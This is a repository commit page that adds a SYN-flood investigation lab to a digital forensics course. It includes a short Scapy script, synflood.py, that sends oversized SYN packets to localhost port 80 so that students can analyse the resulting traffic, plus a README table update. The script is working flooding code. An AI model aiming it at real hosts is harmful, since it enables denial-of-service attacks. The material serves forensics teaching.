mirror of
https://github.com/frankwxu/digital-forensics-lab.git
synced 2026-02-20 13:40:40 +00:00
add SYN-attack tshark investigation
This commit is contained in:
Binary file not shown.
BIN
Illegal_Possession_Images/HTTP_tshark_Forensics_1_SYN_Flood.pptx
Normal file
BIN
Illegal_Possession_Images/HTTP_tshark_Forensics_1_SYN_Flood.pptx
Normal file
Binary file not shown.
Binary file not shown.
11
Illegal_Possession_Images/lab_files/SYN_Flood/synflood.py
Normal file
11
Illegal_Possession_Images/lab_files/SYN_Flood/synflood.py
Normal file
@@ -0,0 +1,11 @@
|
||||
from scapy.all import *
|
||||
|
||||
def send_syn(target_ip_address, target_port, number_of_packets_to_send = 4, size_of_packet = 65000):
|
||||
ip = IP(dst=target_ip_address)
|
||||
tcp = TCP(sport=RandShort(), dport=target_port, flags="S")
|
||||
raw = Raw(b"X" * size_of_packet)
|
||||
p = ip / tcp / raw
|
||||
send(p, count=number_of_packets_to_send, verbose=0)
|
||||
print('send_syn(): Sent ' + str(number_of_packets_to_send) + ' packets of '+ str(size_of_packet) + 'size to ' + target_ip_address + ' on port ' + str(target_port))
|
||||
|
||||
send_syn(target_ip_address = "127.0.0.1", target_port= 80)
|
||||
17
README.md
17
README.md
@@ -162,14 +162,15 @@ The [case study](https://github.com/frankwxu/digital-forensics-lab/tree/main/Ill
|
||||
|
||||
**Topics Covered**
|
||||
|
||||
| Labs | Topics Covered | Size of PPTs |
|
||||
| ----- | --------------------------------------------------------------------------------------------------------------------------------------------- | ------------ |
|
||||
| Lab 0 | [HTTP Analysis using Wireshark (text)](Illegal_Possession_Images/HTTP_Wireshark_Forensics_1_text.pptx) | 3M |
|
||||
| Lab 1 | [HTTP Analysis using Wireshark (image)](Illegal_Possession_Images/HTTP_Wireshark_Forensics_2_image.pptx) | 6M |
|
||||
| Lab 2 | [Rhion Possession Investigation 1: File recovering](Illegal_Possession_Images/Rhion_Possession_1_File_Recovering.pptx) | 9M |
|
||||
| Lab 3 | [Rhion Possession Investigation 2: Steganography](Illegal_Possession_Images/Rhion_Possession_2_Steganography.pptx) | 4M |
|
||||
| Lab 4 | [Rhion Possession Investigation 3: Extract Evidence from FTP Traffic](Illegal_Possession_Images/Rhion_Possession_3_FTP_Traffic_crackzip.pptx) | 3M |
|
||||
| Lab 5 | [Rhion Possession Investigation 4: Extract Evidence from HTTP Traffic](Illegal_Possession_Images/Rhion_Possession_4_HTTP_Traffic.pptx) | 5M |
|
||||
| Labs | Topics Covered | Size of PPTs |
|
||||
| ------- | --------------------------------------------------------------------------------------------------------------------------------------------- | ------------ |
|
||||
| Lab 0 | [HTTP Analysis using Wireshark (text)](Illegal_Possession_Images/HTTP_Wireshark_Forensics_1_text.pptx) | 3M |
|
||||
| Lab 0.0 | [SYN Flood Attack Investigation using tshark](Illegal_Possession_Images/HTTP_tshark_Forensics_1_SYN_Flood.pptx) | 1M |
|
||||
| Lab 1 | [HTTP Analysis using Wireshark (image)](Illegal_Possession_Images/HTTP_Wireshark_Forensics_2_image.pptx) | 6M |
|
||||
| Lab 2 | [Rhion Possession Investigation 1: File recovering](Illegal_Possession_Images/Rhion_Possession_1_File_Recovering.pptx) | 9M |
|
||||
| Lab 3 | [Rhion Possession Investigation 2: Steganography](Illegal_Possession_Images/Rhion_Possession_2_Steganography.pptx) | 4M |
|
||||
| Lab 4 | [Rhion Possession Investigation 3: Extract Evidence from FTP Traffic](Illegal_Possession_Images/Rhion_Possession_3_FTP_Traffic_crackzip.pptx) | 3M |
|
||||
| Lab 5 | [Rhion Possession Investigation 4: Extract Evidence from HTTP Traffic](Illegal_Possession_Images/Rhion_Possession_4_HTTP_Traffic.pptx) | 5M |
|
||||
|
||||
### Investigating Email Harassment
|
||||
|
||||
|
||||
Reference in New Issue
Block a user